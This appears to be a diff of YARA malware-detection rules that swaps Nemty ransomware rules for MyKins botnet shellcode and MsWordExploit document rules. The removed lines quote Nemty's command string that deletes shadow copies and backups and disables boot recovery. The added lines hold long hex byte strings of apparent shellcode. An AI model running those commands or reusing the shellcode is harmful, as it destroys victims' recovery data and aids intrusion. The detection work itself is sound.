0000004100000001000000020000000000000000007F000000000000003F0000000000C0271B0000000000000000000000000020000000000000000000000000000000720000000300000000000000000000000000000000000000C0275A00000000007C000000000000000000000000000000010000000000000000000000000000004900000001000000020000000000000040289A000000000040285A0000000000D83600000000000000000000000000002000000000000000000000000000000053000000010000000200000000000000185F9A0000000000185F5A0000000000380D0000000000000000000000000000080000000000000000000000000000005D000000010000000200000000000000506C9A0000000000506C5A0000000000000000000000000000000000000000000100000000000000000000000000000067000000010000000200000000000000606C9A0000000000606C5A00000000000C172A0000000000000000000000000020000000000000000000000000000000070000000100000003000000000000000090C400000000000090840000000000004B0300000000000000000000000000200000000000000000000000000000001200000001000000030000000000000000DBC7000000000000DB87000000000050A101000000000000000000000000002000000000000000000000000000000018000000080000000300000000000000607CC90000000000607C890000000000D0E80100000000000000000000000000200000000000000000000000000000001D0000000800000003000000000000004065CB000000000040658B00000000001834000000000000000000000000000020000000000000000000000000000000270000000700000002000000000000009C0F4000000000009C0F00000000000064000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 } condition: - filesize >=45KB and filesize <=70KB and all of ($s*) and 4 of ($pattern*) + uint16(0)==0x457f and filesize <26000KB and all of them } -rule TRELLIX_ARC_Nemty_Ransomware : RANSOMWARE FILE +rule TRELLIX_ARC_Shellcode_Mykins_Botnet : SHELLCODE FILE { meta: - description = "Rule to detect Nemty Ransomware" + description = "Rule to detect the shellcode used in the MyKins Botnet" author = "Marc Rivero | McAfee ATR Team" - id = "e9b133d6-fd77-5201-995d-c42bae7cde46" - date = "2020-02-23" + id = "9dc80b27-59e2-5925-9bb7-64a54241f52b" + date = "2018-01-24" modified = "2020-08-14" - reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Nemty.yar#L1-L45" + reference = "https://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_shellcode_mykins_botnet.yar#L1-L27" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "73bf76533eb0bcc4afb5c72dcb8e7306471ae971212d05d0ff272f171b94b2d4" - logic_hash = "d055286670516318c14dcf4e5873b96eede5e1dfb3ee978553fc11f1ac6b3252" + logic_hash = "5fa54c41a423d776d05bdac5b171ee685f54372b4e6aa41b57cce769ac2c6976" score = 75 quality = 70 - tags = "RANSOMWARE, FILE" + tags = "SHELLCODE, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/Nemty" + malware_type = "shellcode" + malware_family = "ShellCode:W32/MyKins" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $x1 = "/c vssadmin.exe delete shadows /all /quiet & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default}" fullword ascii - $s2 = "https://pbs.twimg.com/media/Dn4vwaRW0AY-tUu.jpg:large :D" fullword ascii - $s3 = "MSDOS.SYS" fullword wide - $s4 = "/c vssadmin.exe delete shadows /all /quiet & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} " ascii - $s5 = "recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete" fullword ascii - $s6 = "DECRYPT.txt" fullword ascii - $s7 = "pv3mi+NQplLqkkJpTNmji/M6mL4NGe5IHsRFJirV6HSyx8mC8goskf5lXH2d57vh52iqhhEc5maLcSrIKbukcnmUwym+In1OnvHp070=" fullword ascii - $s8 = "\\NEMTY-DECRYPT.txt\"" fullword ascii - $s9 = "rfyPvccxgVaLvW9OOY2J090Mq987N9lif/RoIDP89luS9Ouv9gUImpgCTVGWvJzrqiS8hQ5El02LdEvKcJ+7dn3DxiXSNG1PwLrY59KzGs/gUvXnYcmT6t34qfZmr8g8" ascii - $s10 = "IO.SYS" fullword wide - $s11 = "QgzjKXcD1Jh/cOLBh1OMb+rWxUbToys2ArG9laNWAWk0rNIv2dnIDpc+mSbp91E8qVN8Mv8K5jC3EBr4TB8jh5Ns/onBhPZ9rLXR7wIkaXGeTZi/4/XOtO3DFiad4+vf" ascii - $s12 = "NEMTY-DECRYPT.txt" fullword wide - $s13 = "pvXmjPQRoUmjj0g9QZ24wvEqyvcJVvFWXc0LL2XL5DWmz8me5wElh/48FHKcpbnq8C2kwQ==" fullword ascii - $s14 = "a/QRAGlNLvqNuONkUWCQTNfoW45DFkZVjUPn0t3tJQnHWPhJR2HWttXqYpQQIMpn" fullword ascii - $s15 = "KeoJrLFoTgXaTKTIr+v/ObwtC5BKtMitXq8aaDT8apz98QQvQgMbncLSJWJG+bHvaMhG" fullword ascii - $s16 = "pu/hj6YerUnqlUM9A8i+i/UhnvsIE+9XTYs=" fullword ascii - $s17 = "grQkLxaGvL0IBGGCRlJ8Q4qQP/midozZSBhFGEDpNElwvWXhba6kTH1LoX8VYNOCZTDzLe82kUD1TSAoZ/fz+8QN7pLqol5+f9QnCLB9QKOi0OmpIS1DLlngr9YH99vt" ascii - $s18 = "BOOTSECT.BAK" fullword wide - $s19 = "bbVU/9TycwPO+5MgkokSHkAbUSRTwcbYy5tmDXAU1lcF7d36BTpfvzaV5/VI6ARRt2ypsxHGlnOJQUTH6Ya//Eu0jPi/6s2MmOk67csw/msiaaxuHXDostsSCC+kolVX" ascii - $s20 = "puh4wXjVYWJzFN6aIgnClL4W/1/5Eg6bm5uEv6Dru0pfOvhmbF1SY3zav4RQVQTYMfZxAsaBYfJ+Gx+6gDEmKggypl1VcVXWRbxAuDIXaByh9aP4B2QvhLnJxZLe+AG5" ascii + $a = { 4883EC28E847000000488D0DF0FFFFFF488D1539000000482BCA4803C14883C428C3CCCC488D05D5FFFFFF482BC8488BC1C3CCCC4883EC28E83F0D000033C04883C428C3CCCCCCCCCCCCCCCCCCCCCCCCE8000000005848B95510004001000000482BC148B950100040010000004803C1C3CCCCCC48897C24084C8BC94D85C0740C488BF9480FBEC2498BC8F3AA488B7C2408498BC1C3CCCC40534883EC20488BD9E85AFFFFFF488D0D53FFFFFF482BD94803C34883C4205BC3CCCCCC33D28BC2EB06FFC04883C10266391175F5F3C3CC668339004C8BC1740B4983C002664183380075F54C2BC20FB70266418904104883C2026685C075EF488BC1C34C8BC14C2BC20FB70266418904104883C2026685C075EF488BC1C3CC4C8BC14C2BC28A024188041048FFC284C075F3488BC1C3CC8039004C8BC1740949FFC04180380075F74C2BC28A024188041048FFC284C075F3488BC1C3CCCCCC48895C24084533D2458BCA4585C07E320FB702663901741A0FB719440FB7D88BC3412BC383F8207409442BDB4183FB20751041FFC14883C1024883C202453BC87CCE488B5C2408453BC8410F95C2418BC2C3CCCC4533C948895108458BC16644390A740D41FFC04963C06644390C4275F3664503C066448901664183C0026644894102C34883EC3833C04C8BD233D248895424228954242A668954242E66894424204885C9741A4D85D27415488BD1488D4C2420E89BFFFFFF488D4C242041FFD24883C438C3CCCC4883EC284863C14C8BCA4C8D44243833D233C94869C0F0D8FFFF488944243841FFD14883C428C3CC48895C241048897C241855488BEC4883EC604883651000488365C800488365D800488365E000488365F000488365F800498BD9498BF848894DC0488BC24C8D4DC04C8D45D0488D4D10BAFFFF1F00C745D030000000C745E840020000FFD0488B4D104885C9740DBA01000000FFD7488B4D10FFD34C8D5C2460498B5B18498B7B20498BE35DC3CCCC488BC44889580848896810565741544883EC308360D80083601800498BF18BEA4C8BE1498BD833FF4C8D4818488D50D88D4F054533C0FFD3894424208B44246085C0750733C0E9C20000008D14004533C033C9FFD6448B4424604C8D4C2460488BD0B9050000004503C0488BF0FFD38944242085C0740B33D2488BCEFF542470EBC28B4C246048B81986611886611886488BDE48F7E1482BCA48D1E94803CA48C1E908894C2460488B4B404885C9742E0FB743383BC57C262BC5992BC2D1F84C63C8781A8BC54A8D0C49992BC2498BD4D1F8448BC0E8AEFDFFFF85C0740B393B740B8B034803D8EBBE488B7B50488B4424784885C0740A4885FF7405488918EB0933D2488BCEFF542470488BC7488B5C2450488B6C24584883C430415C5F5EC3C20000CC4585C07410482BCA8A0288041148FFC241FFC875F3F3C3CC40534883EC20488BD9E8E6FBFFFF488D0DDFFBFFFF482BD94803C34883C4205BC3CCCCCC48895C2408488974241048897C24185541544155488BEC4883EC404863413C4C8BC1B90B020000488BF2C745E04D6D4765C745E474537973C745E874656D52C745EC6F757469C745F06E654164C745F46472657366C745F873006642394C00180F8584000000428B8400880000004533D24903C08B50208B58248B781C448B68184903D04903D84903F84585ED745B8B024533C94903C044380874234C8D5DE0488BC84C2BD8458A240B4584E47410443821750B48FFC149FFC180390075E741803C0100750842807C0DE000740E41FFC24883C204453BD57310EBB3420FB70C538B048F4903C0488906488B1E4885DB750883C8FFE9E1020000488D0D47340000E8D6FEFFFF488BD3488BC8E89BFCFFFF488D0D5034000048898690000000E8B8FEFFFF488B16488BC8E87DFCFFFF488D0D5A34000048898698000000E89AFEFFFF488B16488BC8E85FFCFFFF488D0D6C34000048894608E87FFEFFFF488B16488BC8E844FCFFFF488D0D8934000048894610E864FEFFFF488B16488BC8E829FCFFFF488D0D9E34000048894618E849FEFFFF488B16488BC8E80EFCFFFF488D0DAB34000048894620E82EFEFFFF488B16488BC8E8F3FBFFFF488D0DC834000048894628E813FEFFFF488B16488BC8E8D8FBFFFF488D0DE534000048894630E8F8FDFFFF488B16488BC8E8BDFBFFFF488D0D0235000048894638E8DDFDFFFF488B16488BC8E8A2FBFFFF488D0DF734000048894640E8C2FDFFFF488B16488BC8E887FBFFFF488D0DFC34000048894648E8A7FDFFFF488B16488BC8E86CFBFFFF488D0D0935000048894650E88CFDFFFF488B16488BC8E851FBFFFF488D0D0E35000048894658E871FDFFFF488BC8488B16E836FBFFFF488D0D2B35000048894660E856FDFFFF488B16488BC8E81BFBFFFF488D0D5035000048894668E83BFDFFFF488B16488BC8E800FBFFFF488D0D5D35000048894670E820FDFFFF488B16488BC8E8E5FAFFFF488D0D7235000048894678E805FDFFFF488B16488BC8E8CAFAFFFF488D0D8735000048898680000000E8E7FCFFFF488B16488BC8E8ACFAFFFF488D0D8935000048898688000000E8C9FCFFFF488B16488BC8E88EFAFFFF488D0D8B350000488986A0000000E8ABFCFFFF488B16488BC8E870FAFFFF488D0D95350000488986A8000000E88DFCFFFF488B16488BC8E852FAFFFF488D0DA7350000488986B0000000E86FFCFFFF488B16488BC8E834FAFFFF488D0DA1350000488986B8000000E851FCFFFF488B16488BC8E816FAFFFF488D0DA3350000488986C0000000E833FCFFFF488B16488BC8E8F8F9FFFF488D0DA5350000488986C8000000E815FCFFFF488B16488BC8E8DAF9FFFF488986D000000033C0488B5C2460488B742468488B7C24704883C440415D415C5DC348895C24085556574154415541564157488DAC2410FEFFFF4881ECF00200004533FF488BD9498BF8488BF2488D8DE100000041B80301000033D24C897C24504C897C24604C897C24704C897C24684C89BD480200004488BDE0000000E8EFF7FFFF488D4DC0C745C01C010000FF9688000000837DC40675488B45C885C0752780BDDA00000001754D83C8FF488B9C24300300004881C4F0020000415F415E415D415C5F5E5DC383F801742A83F802740583F80375D380BDDA000000017517EBC8837DC40A75C244397DC875BC80BDDA0000000175B3488BD7488BCBFF56384C393F74A541BD300000004C897C243041BE000000084C8D8D380200004C8D442478488D4C2460418D55DEBB00020000448974242848C785380200004729000044896C24784C897D80895D904C897D884C897D984C897DA0C744242040000000FF96900000004C397C24607509418D45CEE937FFFFFF895D90BB040000004C897C24304C8D8D380200004C8D442478488D4C24708D530241BC1F4C1000448974242844896C24784C897D804C897D884C89A5380200004C897D984C897DA0895C2420FF9690000000488B0F4C8D7708498BD64C8975B0FF5678488B4C2460C74424484000000044897C2440C744243802000000488D44245048894424304C8D85480200004533C94883CAFF4C897C242848C744242000200000FF9698000000488B4C2470895C244844897C2440C744243802000000488D44245048894424304C8D4424684533C94883CAFF4C897C24284C897C24504C89642420 } + $b = { E800000000582D051040000500104000C3558BEC8B45082D001040005DC20400558BECFF7508E80A0A000033C05DC20400558BEC8B4D1085C9741F0FB6450C69C0010101018BD153578B7D08C1E902F3AB8BCA83E103F3AA5F5B8B45085DC3558BECE899FFFFFF8B4D0881E90010400003C15DC20400558BEC8B4D0833C066390174084066833C410075F85DC20400558BEC8B450866833800568BF0740983C60266833E0075F78B4D0C2BF10FB7116689140E83C1026685D275F15E5DC20800558BEC8B55088B450C2BD00FB70866890C0283C0026685C975F18B45085DC20800558BEC8B55088B450C2BD08A08880C024084C975F68B45085DC20800558BEC8B4508803800568BF0740646803E0075FA8B4D0C2BF18A1188140E4184D275F65E5DC20800558BEC5633F63975107E2D8B45088B4D0C0FB704700FB70C71663BC174148BD08BC18BCA2BC883F92074072BC283F8207506463B75107CD333C03B75105E0F95C05DC20C00558BEC8B450C8B550850894204E8FAFEFFFF03C066890283C002668942025DC20800558BEC51515733C0668945F88D7DFAAB33C966AB5F394D08741A394D0C7415FF75088D45F850E8B3FFFFFF8D45F850FF550C8BC88BC1C9C20800558BEC51518B45086AFF9968F0D8FFFF5250E8730A00008945F88D45F8506A006A008955FCFF550CC9C20800558BEC83EC248B4508568945F48D45F4508D45DC5033F668FFFF1F008D45FC508975FC8975F8C745DC180000008975E0C745E8400200008975E48975EC8975F0FF550C3975FC5E740E6A01FF75FCFF5510FF75FCFF5514C9C21000558BEC83EC0C538D45FC5033DB538D45F8506A05895DF8895DFCFF55108945F88B45FC3BC3750733C0E99E000000565303C05053FF55148BF08D45FC508B45FC03C050566A05897514FF55108945F83BC374095356FF551833C0EB6F8B45FC33D2B9F8000000F7F1578945FC8B7E3C3BFB742E0FB746383B450C7C252B450C992BC28BC8D1F978198B450C992BC2D1F850FF75088D044F50E83BFEFFFF85C0740A8B063BC3740903F0EBC18B7E44EB028BFB8B451C3BC374083BFB74048930EB0753FF7514FF55188BC75F5E5BC9C21800C21400558BEC837D100074178B4D088B450C2BC88A10FF4D1088140140837D100075F15DC20C00558BECE8B3FCFFFF8B4D0881E90010400003C15DC20400558BEC83EC2C538B5D088B433CB90B010000568B750CC745D44D6D4765C745D874537973C745DC74656D52C745E06F757469C745E46E654164C745E86472657366C745EC730066394C18180F858F0000008B44187803C38B501C8B482003D3578B78248B40188955F033D203CB03FB8955FC8945F485C07466EB038B5D088B149183650C0003D3803A0074238D5DD42BDA8BC2895DF8EB038B5DF88A1C0384DB740D38187509FF450C4080380075E98B450C803C10007507807C05D400740E8B55FC428955FC3B55F472B0EB128B45FC0FB704478B4DF08B048103450889065F8B0685C0750883C8FFE9230200005068D0414000E8F0FEFFFF50E831FDFFFFFF3689464868F0414000E8DBFEFFFF50E81CFDFFFFFF3689464C6818424000E8C6FEFFFF50E807FDFFFFFF368946046844424000E8B1FEFFFF50E8F2FCFFFFFF368946086878424000E89CFEFFFF50E8DDFCFFFFFF3689460C68A8424000E887FEFFFF50E8C8FCFFFFFF3689461068CC424000E872FEFFFF50E8B3FCFFFFFF368946146800434000E85DFEFFFF50E89EFCFFFFFF368946186834434000E848FEFFFF50E889FCFFFFFF3689461C686C434000E833FEFFFF50E874FCFFFFFF36894620687C434000E81EFEFFFF50E85FFCFFFFFF36894624689C434000E809FEFFFF50E84AFCFFFFFF3689462868C0434000E8F4FDFFFF50E835FCFFFFFF3689462C68DC434000E8DFFDFFFF50E820FCFFFFFF368946306810444000E8CAFDFFFF50E80BFCFFFFFF36894634684C444000E8B5FDFFFF50E8F6FBFFFFFF368946386874444000E8A0FDFFFF50E8E1FBFFFFFF3689463C68A0444000E88BFDFFFF50E8CCFBFFFFFF3689464068D0444000E876FDFFFF50E8B7FBFFFFFF3689464468EC444000E861FDFFFF50E8A2FBFFFFFF368946506808454000E84CFDFFFF50E88DFBFFFFFF368946546830454000E837FDFFFF50E878FBFFFFFF36894658685C454000E822FDFFFF50E863FBFFFFFF3689465C6870454000E80DFDFFFF50E84EFBFFFFFF368946606890454000E8F8FCFFFF50E839FBFFFFFF3689466468AC454000E8E3FCFFFF50E824FBFFFF89466833C05E5BC9C20800558BEC81EC5C020000535633DB5768030100008D85A5FDFFFF5350895DF8895DE8895DDC895DF4895DFC889DA4FDFFFFE889F9FFFF8B7D0C83C40C8D85A8FEFFFF50C785A8FEFFFF1C010000FF574483BDACFEFFFF05751283BDB0FEFFFF02743983BDB0FEFFFF01EB2E83BDACFEFFFF06750E399DB0FEFFFF7510807DC201751983C8FF5F5E5BC9C20C0083BDB0FEFFFF0175ED807DC20175E78B751056FF7508FF571C391E74D95368000000086A408D45EC508D45C4506A0E8D45E850C745EC47250000895DF0C745C418000000895DC8C745D000020000895DCC895DD4895DD8FF5748395DE875056AFE58EB955368000000086A048D45EC508D45C4506A068D45DCBE0B4C1000508975EC895DF0C745C418000000895DC8C745D000020000895DCC895DD4895DD8FF57488B45108D480451FF30894DE0FF573C6A40536A028D45F850536800200000538D45FC506AFFFF75E8FF574C6A04536A028D45F8505356538D45F4506AFFFF75DC895DF88975EC895DF0FF574C395DFC0F84330200008B75F43BF30F8428020000895E048B85B4FEFFFF8946108B85ACFEFFFF8946088B85B0FEFFFF89460C6A0C5889462C8946308B4510C7060C3C1000C7462830000000C746342C000000C7463818000000C7463CA80100008B401C894618895D0C6840464000E800F8FFFF8BC88B450C8A0C0180F10D888C05A4FDFFFF4089450C3D040100007CD98D8DA4FDFFFF8D46405150E855F8FFFF6844474000E8C9F7FFFF508D464050E85DF8FFFF8B45108B40283BC3742C8B4E1883F902750A8B40200504020000EB0D83F90375158B40200500010000508D860001000050E80BF8FFFFE825F7FFFFB9881C400081E90010400003C189450C33C9EB038B450C8A04088B55FC88040A4181F94825000072EB535353680C3C100056FF572C8BF03BF37460536A0156FF57386A1053536A015356FF57348B75108946203BC37447C680040200004E8B4620C68005020000538B4620C680060200002E8B4620C68007020000658B4620C68008020000788B4620C68009020000658B462088980A020000EB038B75108B46243BC30F8497000000895D083958040F868B000000895D0C8B46248B4D0C8B8401DC0000008D4D105150895D10FF5714395D107455FF7510FF57683B06754B536A3053FF57048945E43BC3743DE833F6FFFF53B91E13400081E90010400003C18B4DFC6A0183C12051535053FF7510FF75E4FF57245353FF75F4FF75E4FF5728FF770C6A01E8C1F7FFFFFF45088B46248B4D0883450C403B48040F8278FFFFFFFF75E0FF574033C0E9CFFCFFFFFF75E0FF57406AFDE92AFDFFFF558BEC81EC0C020000565733F66A688D8540FFFFFF565089B53CFFFFFFE8DAF5FFFF83C40C6A0A5933C06A0A8975A88D7DACF3AB5989B510FFFFFF8DBD14FFFFFFF3AB8D45A8898538FFFFFF8D853CFFFFFF50FF7508C745C401000000C7852CFFFFFF02000000E8BBF8FFFF85C00F8582010000538D85F4FDFFFF50C785F4FDFFFF1C010000FF5580BBEC45400083BDF8FDFFFF05750353EB0568D0454000E86CF8FFFF8D4DCC51FFB54CFFFFFFFFB540FFFFFFFFB544FFFFFF6A1850E856F7FFFFFFB548FFFFFF8BF83BFE750C68D0070000E8B9F6FFFFEBB46888130000E8ADF6FFFF8D45A8508D853CFFFFFF5057E849FBFFFF85C00F85F8000000EB10FFB548FFFFFF68D0070000E882F6FFFF8B45C883781C0175E783BDF8FDFFFF05750E6808464000E8E5F7FFFF6A16EB0C68D0454000E8D7F7FFFF6A18598D9534FFFFFF52FFB54CFFFFFFFFB540FFFFFFFFB544FFFFFF5150E8BCF6FFFF } condition: - ( uint16(0)==0x5a4d and filesize <400KB and (1 of ($x*) and 4 of them )) + filesize <1KB and any of them } -rule TRELLIX_ARC_Nemty_Ransomware_2_6 : RANSOMWARE FILE +rule TRELLIX_ARC_Msworldexploit_Builder_Doc : MALDOC FILE { meta: - description = "Rule to detect Nemty Ransomware version 2.6" + description = "Rule to detect RTF/Docs files created by MsWordExploit Builder" author = "Marc Rivero | McAfee ATR Team" - id = "335dff33-d078-58ba-b68b-a949895b710f" - date = "2020-04-06" + id = "6c4c091b-5fce-583a-bc17-31830251892c" + date = "2024-09-01" modified = "2020-08-14" - reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Nemty.yar#L47-L80" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_MsWordExploit_DOC.yar#L1-L24" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "52b7d20d358d1774a360bb3897a889e14d416c3b2dff26156a506ff199c3388d" - logic_hash = "dacf709838ef2ef65d25bdbbd92007ab46a95953031d7bee75eac046f670171a" + logic_hash = "f85c6d79e5ed20084d35f9de92a9d9ce20cf4b3100b1226d64147e366934585d" score = 75 - quality = 70 - tags = "RANSOMWARE, FILE" - rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/Nemty" + quality = 68 + tags = "MALDOC, FILE" + malware_type = "maldoc" + malware_family = "Maldoc:W32/MSwordExploit" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $pattern = { 558B??83????53565789????29????6A??8D????8D????5A8B??89????8A????88????8B????8A????88??8A????88????8A??88????03??03??FF????75??89????8D????8D????8D????89????89????29????89????29????89????29????8D????8D????89????29????89????29????8B????89????29????8D????F6??????8B????8A????8B????8A????8A??88????8B????8A????88????75??0FB6??8A??????????0FB6??88????8A??????????0FB6????8A??????????88????0FB6????8A??????????88????8B????C1????32??????????8B????8A????32??8B????88????8A????32??88????8A??32????83????88????8B????8A????32????FF????88??83????83????83??????0F82????????5F5E5BC9C3558B??560FB6??57C1????03????6A??5F6A??5E8A??30??40414E75??4F75??5F5E5DC356576A??5F6A??8B??5E0FB6??8A??????????88??83????4E75??414F75??5F5EC38A????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????88????C3558B??5153566A??83????5E8A????32??8A????8A????88????32??32??88????88????32??8A??C0????B3??F6??02??32??32????8A????32????32??88????8A??C0????F6??02??32??32????8A????32????88????8A??C0????F6??02??32??32??8A????32????32????88??8A??C0????F6??02??32??32????83????32????4E88????75??5E5BC9C3558B??53FF????8B??32??E8????????59B3??8B??E8????????8B??E8????????8B??E8????????FF????8B??8A??E8????????FE??5980????72??8B??E8????????8B??E8????????5B8B??B0??5DE9????????558B??81??????????A1????????33??89????8B????578D??????????89??????????E8????????33??6A??5839????76??5683????75??508D????5350E8????????8D??????????508D????E8????????83????6A??5880??????75??C6??????4879??EB??FE????33??8A??????8B??????????30????47403B????72??5E8B????33??5FE8????????C9C3558B??51515333??5633??32??89????39????0F86????????578B????8B????8A????8B??83????74??4F74??4F75??21????0FB6??0FB6??83????8B??C1????C1????0B??8A??????????83????88????8A??????????8B????88??????83????EB??0FB6??0FB6??83????6A??C1????C1????5E0B??EB??33??0FB6??46C1????8A??????????88????40FF????8A??8B????3B????72??5F4E74??4E75??0FB6??83????8A????????????88????C6????????83????EB??0FB6??83????C1????8A??????????88????66????????????83????5EC6??????5BC9C3558B??33??F6??????75??5733??39????76??8B????8A????80????74??80????7C??80????7F??0FB6??8A??????????80????74??8B??83????83????74??4A74??4A74??4A75??08????40EB??8A??C0????80????08????40C0????EB??8A??C0????80????08????40C0????EB??C0????88????473B????72??EB??33??5F5DC3558B??518B??85??74??8B????568B??89????3B??74??576A??33??E8????????83????3B????75??5FFF??E8????????595E33??89??89????89????C9C3558B??80??????74??83??????72??538B??85??74??575356E8????????83????53E8????????595BC7????????????89????C6??????5DC2????C7??????????E9????????558B??568B??C7??????????E8????????F6??????74??56E8????????598B??5E5DC2????558B??83????81??????????A1????????33??89????????????5356578D????508D??????E8????????68????????8D????????????E8????????6A??5F33??83????66????????8D????8B??33??5089??????89??????E8????????E8????????33??66????????8B????????????03??????83????8D??????89??????89??????E8????????538D??????5083????8D??????E8????????538D????????????5083????E8????????8B??8D??????E8????????6A??33??E8????????83????????8B??????73??8D??????8D????????????5150FF??????????89??????83????0F84????????8B??????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????F6??????????????8D????????????508D??????8D??????74??E8????????598D??????51E8????????8B??598D??????E8????????6A??33??8D??????E8????????6A??8D??????E8????????83????8D??????8B??50E8????????E8????????83????E9????????E8????????8B??598D??????E8????????6A??33??8D??????E8????????8D????????????50FF??????????508D??????E8????????8B??????6A??5F39??????73??8D??????8B??????????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73